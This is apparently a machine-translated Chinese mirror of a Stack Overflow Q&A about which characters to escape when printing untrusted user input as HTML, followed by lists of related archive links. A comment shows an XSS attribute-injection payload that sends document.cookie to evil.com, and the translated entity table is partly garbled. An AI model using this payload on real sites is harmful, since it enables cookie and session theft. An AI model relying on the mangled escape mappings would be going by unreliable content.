那些遇到过的问题

转义HTML输出的最低要求

Tom*_*Tom 3 security html-escape-characters

在输出之前转义用户生成的内容时,哪些字符是必需的并且足够?(换句话说:在输出以前来自不受信任的匿名来源的文本时,Web开发人员应该逃脱的角色是什么?)

ale*_*lex 6

回显到页面时,您应该进行编码

  • '&'(&符号)成为' &'
  • '''(双引号)成' "'
  • '''(单引号)变为' ''
  • '<'(小于)成为' &lt;'
  • '>'(大于)成为' &gt;'

来自PHP的htmlspecialchars() 文档.

请注意,上下文也很重要.

您还需要考虑字符集.

  • @ChrisW我在这里回复你的名字`<input name ="name"value ="<?php echo $ name;?>">`.现在如果我输入我的名字为'alex"onfocus ="window.location ='http://www.evil.com/steal.php?coolkie ='+ encodeURI(document.cookie) (2认同)

归档时间:

查看次数:

919 次

最近记录:

15 年,10 月 前
正在替换:<和>与&lt; 和&gt; 足以防止XSS注射? 14
更多相关链接
相关归档
如何从源代码升级CentOS 6.5/Linux/Unix中的OpenSSL? 60
如何安全地编译和运行Haskell中的第三方代码片段? 15
AccessController.doPrivileged是否为JavaScript线程提供了签名Applet的权限? 11
重新生成会话ID 9
Android加密/解密sqlite数据库100%安全 6
在Rails中,secret_key_base可以更新而不会丢失以前签名的数据吗? 6
Spring Security登录:用户必须在登录前激活他们的帐户 5
为什么我们应该在 API 的 HTTP 响应中包含 CSP 标头? 5
使用PHP作为Javascript文件 - 安全性? 2
保护秘密数据免受攻击 2
难疑归档
如何修改现有的,未删除的提交? 7669
什么是sleep()的JavaScript版本? 2115
警告:push.default未设置; 它的隐含值在Git 2.0中发生了变化 1615
ORM(对象关系映射)中的"N + 1选择问题"是什么? 1507
你什么时候使用git rebase而不是git merge? 1461
Python的隐藏功能 1419
在视图控制器之间传递数据 1340
虚拟成员在构造函数中调用 1270
创建一个带参数的Bash别名? 1164
如何从git存储库中删除目录? 1138